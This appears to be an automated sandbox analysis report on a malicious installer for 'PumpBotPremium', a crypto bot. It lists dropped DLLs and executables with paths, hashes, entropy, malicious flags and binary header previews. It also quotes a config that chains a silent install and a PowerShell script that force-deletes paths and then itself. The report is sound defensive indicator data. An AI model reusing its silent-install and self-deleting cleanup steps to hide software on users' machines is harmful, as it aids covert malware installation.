SHA-512:	19B85C010C98FA75EACFD0B86F9C90A2DBF6F07A2B3FF5B4120108F3C26711512EDF2B875A782497BDB3D28359325AD95C17951621C4B9C1FD692FDE26B77C33
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A.`. q3. q3. q3.Pp2. q3p..3. q3.Pt2. q3.Pu2. q3.Pr2. q3.X.3. q3.@w2. q3.@p2. q3. p3.!q3YQy2C q3YQq2. q3YQ.3. q3YQs2. q3Rich. q3........PE..d...].m_.........." ................P........................................p.......t....`......................................... ...X`..x...T....@..8....@..`....4.......P......._..............................._..0............................................text.............................. ..`.rdata...}.......~..................@..@.data........ ......................@....pdata..`....@......................@..@.rsrc...8....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\tk86t.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1539768
Entropy (8bit):	6.174567704767307
Encrypted:	false
SSDEEP:	24576:s0Ul9NGSzfPBTBi7OU987qBkS0Ahl+FUduBGdiuazMsR+tCJuLxTQVgkBcdi8yXb:sLrrXi7f87wkS0Ahl+FUduBGdiFwo4Q5
MD5:	E3C7ED5F9D601970921523BE5E6FCE2C
SHA1:	A7EE921E126C3C1AE8D0E274A896A33552A4BD40
SHA-256:	BD4443B8ECC3B1F0C6FB13B264769253C80A4597AF7181884BDA20442038EC77
SHA-512:	BFA76B6D754259EABC39D701D359DD96F7A4491E63B17826A05A14F8FDF87656E8FC541A40E477E4FEF8D0601320DD163199520E66D9EE8B5D6BB5CD9A275901
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......cm..'..'..'...\|..%...\|.,...\|./...\|.#...l.$...tr.7...l..2..'...n..}...}.&..}..&..}.&..Rich'..........PE..d.....m_.........." .........x.......................................................y....`.........................................P...X@...T..\|........{... .......b.......`...A..`)...............................)..0...............8............................text...x........................... ..`.rdata...e.......f..................@..@.data...(............^..............@....pdata....... ......................@..@.rsrc....{.......\|..................@..@.reloc...A...`...B... ..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\unicodedata.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1118448
Entropy (8bit):	5.371925569374372
Encrypted:	false
SSDEEP:	12288:t0lBMmuZ63N6QCb5Pfhnzr0ql8L8kdM7IRG5eeme6VZyrIBHdQLhfFE+uUs:ilBuVZV0m81MMREtV6Vo4uYUs
MD5:	A40FF441B1B612B3B9F30F28FA3C680D
SHA1:	42A309992BDBB68004E2B6B60B450E964276A8FC
SHA-256:	9B22D93F4DB077A70A1D85FFC503980903F1A88E262068DD79C6190EC7A31B08
SHA-512:	5F9142B16ED7FFC0E5B17D6A4257D7249A21061FE5E928D3CDE75265C2B87B723B2E7BD3109C30D2C8F83913134445E8672C98C187073368C244A476AC46C3EF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N$z./J)./J)./J).W.)./J).ZK(./J).ZO(./J).ZN(./J).ZI(./J)YZK(./J).DK(./J)./K)./J)YZG(./J)YZJ(./J)YZ.)./J)YZH(./J)Rich./J)................PE..d....O[a.........." .....B..........`*.......................................@............`.............................................X...h........ .......................0......0L..T............................L..8............`..x............................text....A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	97160
Entropy (8bit):	6.422776154074499
Encrypted:	false
SSDEEP:	1536:yDHLG4SsAzAvadZw+1Hcx8uIYNUzUnHg4becbK/zJrCT:yDrfZ+jPYNznHg4becbK/Fr
MD5:	11D9AC94E8CB17BD23DEA89F8E757F18
SHA1:	D4FB80A512486821AD320C4FD67ABCAE63005158
SHA-256:	E1D6F78A72836EA120BD27A33AE89CBDC3F3CA7D9D0231AAA3AAC91996D2FA4E
SHA-512:	AA6AFD6BEA27F554E3646152D8C4F96F7BCAAA4933F8B7C04346E410F93F23CFA6D29362FD5D51CCBB8B6223E094CD89E351F072AD0517553703F5BF9DE28778
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d....(.`.........." .........`......p.....................................................`A.........................................B..4....J...............p..X....X...#..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\vcruntime140_1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37256
Entropy (8bit):	6.2987721506649335
Encrypted:	false
SSDEEP:	384:5InvMCmWEyhUcSLt5a9k6KrOE5fY/ntz5txWE6Wc+XfbmuncS74GdWrUKWj14gHg:dCm5yhUcwrHY/ntTxT6ovR7VxIV1z
MD5:	7667B0883DE4667EC87C3B75BED84D84
SHA1:	E6F6DF83E813ED8252614A46A5892C4856DF1F58
SHA-256:	04E7CCBDCAD7CBAF0ED28692FB08EAB832C38AAD9071749037EE7A58F45E9D7D
SHA-512:	968CBAAFE416A9E398C5BFD8C5825FA813462AE207D17072C035F916742517EDC42349A72AB6795199D34CCECE259D5F2F63587CFAEB0026C0667632B05C5C74
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D_.O.>...>...>...N...>..RK...>...F^..>...>..1>..RK...>..RK...>..RK...>..RK...>..RK2..>..RK...>..Rich.>..........................PE..d....(.`.........." .....:...6......`A....................................................`A.........................................l.......m..x....................n...#......<...(b..T............................b..8............P..X............................text...e9.......:.................. ..`.rdata.. "...P...$...>..............@..@.data... ............b..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..<............l..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\win32crypt.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	123904
Entropy (8bit):	5.965293722751848
Encrypted:	false
SSDEEP:	3072:Nz7lVQlgMZhNKMiZj6f9XCqrN5dolqF7Ea:Nz7+gMnNbqQh5Wlk7
MD5:	ACC2C2A7DD9BA8603AC192D886FF2ACE
SHA1:	EAE213D0B86A7730161D8CC9568D91663948C638
SHA-256:	4805C4903E098F0AE3C3CBEBD02B44DF4D73AB19013784F49A223F501DA3C853
SHA-512:	23B97707843D206833E7D4F0DFCAD79A597DE0867BAB629026DD26BFF9F1C640BB4CD1BC6BCE7ABE48353FEAC8C367E93EA7B15425D6FF8B1AEA07A716F5E491
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................J.........................................`..............................................Rich............PE..d......d.........." ......................................................... ............`..........................................o..................d.......................H....G..T............................H..8............................................text............................... ..`.rdata..............................@..@.data....-.......(..................@....pdata..............................@..@.rsrc...d...........................@..@.reloc..H...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	60657664
Entropy (8bit):	7.998926359127934
Encrypted:	true
SSDEEP:	1572864:OZXx6Ltn72vM/a4cz6Q1mbg12hpEM6O4w:OT6LxSTag12hpYO4
MD5:	65A50EBD00840753BA72C425D692E72E
SHA1:	8D4DED8577600F8C67FC430040FCE0442C4781D1
SHA-256:	B24C19B43466F6AC251E11877EC59A0DE5CB12C19B277D037A10046B45EE5944
SHA-512:	2B2B5C24360EF6B207D8D99AFBD8F8AD596A4A4C5D46827CF90B8882C171797588E4C74DE9AA4F03DDA26ADB1E23FCDCD7165EB66DC3F696EDC304AC0CBB2021
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...9..e...............)............%..........@..........................................`... ..............................................0..x....`.........................................................(...................H3...............................text...............................`..`.data...............................@....rdata..`*.......,..................@..@.eh_fram............................@....pdata..............................@..@.xdata....... ......................@..@.bss....p....0...........................idata..x....0......................@....CRT....`....@......................@....tls.........P......................@....rsrc........`......................@..@.reloc.............................@..B................................................................................................................................

C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	892416
Entropy (8bit):	6.410828209620259
Encrypted:	false
SSDEEP:	12288:5yG2Npmq8CQ/U8nPC4Q23akLoImMTLg5TfH9IPuh5XOOyR3NZ4:cjoU8ndLoIrTLKTf0uh5ZylNZ4
MD5:	6BE93FD0684F69F0FA34E68B750CF23E
SHA1:	80CBCE40A62B1EE4C0BBD472FFF78A1644AAB5C2
SHA-256:	C96BA812D168C457CBF82919E98213061F89AEDEE4ABC09A437E9D43187A4199
SHA-512:	C8285F8D8E98D2FCE06414B009CC6517A8634DCCC4EE40DD78D3A0D4000CE0B92654E5765F39EBEDC2F8F0639AFE1D3409FED9072AEA421BCB3CD99F7512D9BD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A}%R .vR .vR .v.R.w_ .v.R.w. .v.\.wA .v.\.wK .v.R.wI .v.\.w5 .v.R.wS .v.R.wK .vR .v.!.v.].w. .v.].vS .vR .vS .v.].wS .vRichR .v................PE..L....+Jd.........."....#............%.............@..........................0......m.....@.................................`G......................................X ..p....................!......(...@....................A.......................text............................... ..`.rdata..r~..........................@..@.data....q...`.......H..............@....rsrc................`..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.ini

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	1476
Entropy (8bit):	3.4926134839308047
Encrypted:	false
SSDEEP:	24:Q+xMrxwq+8JrxwqEOVvrxwqqEolkWTZTa2rxwqqE/rGF7rxwqfzv:rxMtmotPvt6kWdm2tpo7tD
MD5:	0C56C35AD671CB7E04C9D240922B2713
SHA1:	53C5883AE1F0AFDBBDFD1F9CEB362BFAA4BF7437
SHA-256:	D899AED1360F209BFBCAD38D2D4B1E1EA6D6725EBE9B7A1ADEC1E52FA61FFD9B
SHA-512:	76363E0BD57475CFA825880B24C70AE30913D3D2FFF79C235D4B91A72799A8BEE21EE8EE7B581095A5F13D8F12A00DBF4962AE05A2A043E78C6AAAA41A0DBCF2
Malicious:	false
Preview:	..[.G.e.n.e.r.a.l.O.p.t.i.o.n.s.].....O.p.t.i.o.n.s.=.b.h.....D.o.w.n.l.o.a.d.F.o.l.d.e.r.=.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.C.o.i.n.s.w...a.p.p.\.P.u.m.p.B.o.t.P.r.e.m.i.u.m.\.p.r.e.r.e.q.u.i.s.i.t.e.s.\.....E.x.t.r.a.c.t.i.o.n.F.o.l.d.e.r.=.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.C.o.i.n.s.w...a.p.p.\.P.u.m.p.B.o.t.P.r.e.m.i.u.m.\.p.r.e.r.e.q.u.i.s.i.t.e.s.\.....[.P.R.E.R.E.Q.U.I.S.I.T.E.S.].....A.p.p.1.=.B.l.o.c.k.c.h.a.i.n.C.o.n.n.e.c.t.o.r.....[.A.p.p.1.].....S.e.t.u.p.F.i.l.e.=.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.C.o.i.n.s.w...a.p.p.\.P.u.m.p.B.o.t.P.r.e.m.i.u.m.\.p.r.e.r.e.q.u.i.s.i.t.e.s.\.B.l.o.c.k.c.h.a.i.n.C.o.n.n.e.c.t.o.r.\.B.l.o.c.k.c.h.a.i.n.C.o.n.n.e.c.t.o.r...e.x.e.....B.a.s.i.c.U.i.C.o.m.m.a.n.d.L.i.n.e.=./.s.....N.o.U.i.C.o.m.m.a.n.d.L.i.n.e.=./.s.....O.p.t.i.o.n.s.=.i.p.....[.P.R.E.R.E.Q._.C.H.A.I.N.E.R.].....C.l.e.a.n.u.p.F.i.l.e.s.=.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.

C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\file_deleter.ps1

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23157
Entropy (8bit):	6.0243033942126525
Encrypted:	false
SSDEEP:	384:gsgQpJjMUmMZYvqsB9tq5Pr056H46ftIj3OD1uz9p/fO7ywaX:eQpJjMUOvdEYSFIzpN6gX
MD5:	54A3795308331741EBDC2B0B754EF911
SHA1:	4D49846CF892E0B7DABC8407C1F8B0459994951C
SHA-256:	27545C48DFE53E90915094E4E033E344E316D43832C954851640B7886E97828E
SHA-512:	E00678822BCC457CD1ADFEF44EF25D734986F1F7B23AB3582D3968EEF38C70A91CB1B11F933DA2EA31324A553127EDA9D76DA87B0DCB6E79C66E2356C81DB309
Malicious:	false
Preview:	param(.. [Parameter(Mandatory = $true)].. [string[]]$paths,.. [int]$retry_count = 0..)....# Delete paths using parallel jobs. ..$jobs = $paths \| ForEach-Object {.. Start-Job -ScriptBlock {.. param(.. [string]$path,.. [int]$retry_count = 0.. ).... if (Test-Path -LiteralPath $path) {.. $count = 0.. while ($true) {.. Remove-Item -LiteralPath $path -Force.. if (-not (Test-Path -LiteralPath $path) -or ($count -ge $retry_count)) {.. return;.. }.. $count++.. Start-Sleep -s 5 #sleep 5 seconds.. } .. }.. } -ArgumentList $_, $retry_count ..}....# Wait for the delete jobs to finish..Wait-Job -Job $jobs....# Self delete..Remove-Item -Path $MyInvocation.MyCommand.Source....# SIG # Begin signature block..# MII9SwYJKoZIhvcNAQcCoII9PDCCPTgCAQExDzANBglghkgBZQMEAgEFADB5Bgor..# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMC

C:\Windows\Installer\5c7177.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {7FFEF896-5843-4272-ACBA-A4977C267D92}, Number of Words: 2, Subject: PumpBotPremium, Author: Coinsw.app, Name of Creating Application: PumpBotPremium, Template: ;1033, Comments: This installer database contains the logic and data required to install PumpBotPremium., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Mar 5 02:13:07 2024, Number of Pages: 200
Category:	dropped
Size (bytes):	63906816
Entropy (8bit):	7.9808529892837035
Encrypted:	false
SSDEEP:	1572864:9ZXx6Ltn72vM/a4cz6Q1mbg12hpEM6O4w:9T6LxSTag12hpYO4
MD5:	9F08612018C349C8C6A27805064E34C6
SHA1:	75C97A2A7F4DBAD493239110D8695DF62C84FE0D
SHA-256:	C6309489B3F61E00EC320DB6C0E6FFD2875A3F94F86EE00B30946FA6BA535551
SHA-512:	8A0BB48E44DA2AD9EFC656E9E35EB5C9A3948BAFFEA33241A2E9932F3E5E30786600E746494E0A105DB06550DEF0364E0356EC7F3EA1034D913468C82B369DCC
Malicious:	false
Preview:	......................>...........................................v....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\5c717a.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {7FFEF896-5843-4272-ACBA-A4977C267D92}, Number of Words: 2, Subject: PumpBotPremium, Author: Coinsw.app, Name of Creating Application: PumpBotPremium, Template: ;1033, Comments: This installer database contains the logic and data required to install PumpBotPremium., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Mar 5 02:13:07 2024, Number of Pages: 200
Category:	dropped
Size (bytes):	63906816
Entropy (8bit):	7.9808529892837035
Encrypted:	false
SSDEEP:	1572864:9ZXx6Ltn72vM/a4cz6Q1mbg12hpEM6O4w:9T6LxSTag12hpYO4
MD5:	9F08612018C349C8C6A27805064E34C6
SHA1:	75C97A2A7F4DBAD493239110D8695DF62C84FE0D
SHA-256:	C6309489B3F61E00EC320DB6C0E6FFD2875A3F94F86EE00B30946FA6BA535551
SHA-512:	8A0BB48E44DA2AD9EFC656E9E35EB5C9A3948BAFFEA33241A2E9932F3E5E30786600E746494E0A105DB06550DEF0364E0356EC7F3EA1034D913468C82B369DCC
Malicious:	false
Preview:	......................>...........................................v....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI7B99.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	601920
Entropy (8bit):	6.469032452979565
Encrypted:	false
SSDEEP:	12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
MD5:	CADBCF6F5A0199ECC0220CE23A860D89
SHA1:	073C149D68916520AEA882E588AB9A5AE083D75A
SHA-256:	42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
SHA-512:	CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......\|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI7BF7.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	601920
Entropy (8bit):	6.469032452979565
Encrypted:	false
SSDEEP:	12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
MD5:	CADBCF6F5A0199ECC0220CE23A860D89
SHA1:	073C149D68916520AEA882E588AB9A5AE083D75A
SHA-256:	42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
SHA-512:	CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......\|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI7C27.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	601920
Entropy (8bit):	6.469032452979565
Encrypted:	false
SSDEEP:	12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
MD5:	CADBCF6F5A0199ECC0220CE23A860D89
SHA1:	073C149D68916520AEA882E588AB9A5AE083D75A
SHA-256:	42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
SHA-512:	CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......\|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI7C48.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	601920
Entropy (8bit):	6.469032452979565
Encrypted:	false
SSDEEP:	12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
MD5:	CADBCF6F5A0199ECC0220CE23A860D89
SHA1:	073C149D68916520AEA882E588AB9A5AE083D75A
SHA-256:	42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
SHA-512:	CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......\|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI7C87.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	601920
Entropy (8bit):	6.469032452979565
Encrypted:	false
SSDEEP:	12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
MD5:	CADBCF6F5A0199ECC0220CE23A860D89
SHA1:	073C149D68916520AEA882E588AB9A5AE083D75A
SHA-256:	42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
SHA-512:	CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......\|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI7CB7.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	726848
Entropy (8bit):	6.456117102365696
Encrypted:	false
SSDEEP:	12288:OuYFjg26D559YpR0FeANNnJuXtmy6/EJg3LQxPmJPsJZTPt55dkHawNf:OhgzVNngEyOE+3LkuJkJ9155dkHawNf
MD5:	16427FA171BD703839D252C580C42CD0
SHA1:	268EC6C390D5FBA3AF0D3CA55ECFC65D9E232906
SHA-256:	1E84A4DA22CB64AB037AFA6CA184E080463DD870D6DB2F42DDA2414FD2311CAF
SHA-512:	52E2B47B6F461D85A689243C89C91151CD643952CD64FA0EFB00522A4DE3D4FFEFD09ADBEB524ED664B9DA0FD141EBCD5A12D780DEBD79741626183AE837C77C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................k...x.....x...........x........................................I.....!..........Rich...........PE..L....+Jd.........."!...#............k~....................................... ............@......................... M......<N..........h...............@=.......n..h@..p....................A..........@....................J..@....................text...l........................... ..`.rdata.."b.......d..................@..@.data....'...p.......N..............@....rsrc...h............d..............@..@.reloc...n.......p...j..............@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI7D93.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	2227
Entropy (8bit):	5.7404077634056865
Encrypted:	false
SSDEEP:	48:czKRC/8zSAj+fijYD8S+XaZeqanlgbn17cgBCZRBip:c2u6SaoWw4keH6b5cgB8r+
MD5:	EA02CD2F22AB98B869ED09F73697BAEB
SHA1:	CAFA59C1EF7BB67D42A37D532568A5F37F4FEB4D
SHA-256:	EA27FD35BC4E02102292F26AC1DE0BBA332666EDDEC9521314B5FE02FB93FA74
SHA-512:	51222211DE181DC74EC2AF904D6A7EA0B88099638D2C8F6CD6B52AB2E0FB257AD3A203893885AC0264D51D05FBF3F5AAACD7F917104F80A96DCA469FF276D0F1
Malicious:	false
Preview:	...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{26BCD435-D353-42A0-8C43-818FC0FA354F}..PumpBotPremium..PumpBotPremium.msi.@.....@.....@.....@........&.{7FFEF896-5843-4272-ACBA-A4977C267D92}.....@.....@.....@.....@.......@.....@.....@.......@......PumpBotPremium......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{90615BD6-7F96-483E-9146-350C31DE947E}1.C:\Program Files (x86)\Coinsw.app\PumpBotPremium\.@.......@.....@.....@......&.{517BF6FB-31C5-4EEA-993C-02A1296FF8EB}..02:\Software\Coinsw.app\PumpBotPremium\Version.@.......@.....@.....@......&.{DF9A949B-1C3B-4A84-A210-70F3FFF5F910}p.02:\Software\Caphyon\Advanced Installer\Prereqs\{26BCD435-D353-42A0-8C43-818FC0FA354F}\1.0.0\BlockchainConnector.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".1.C:\Program Files (x86)\Coinsw.app\PumpBotPremium\.@........WriteRegistryValues

C:\Windows\Installer\MSI8554.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	726848
Entropy (8bit):	6.456117102365696
Encrypted:	false
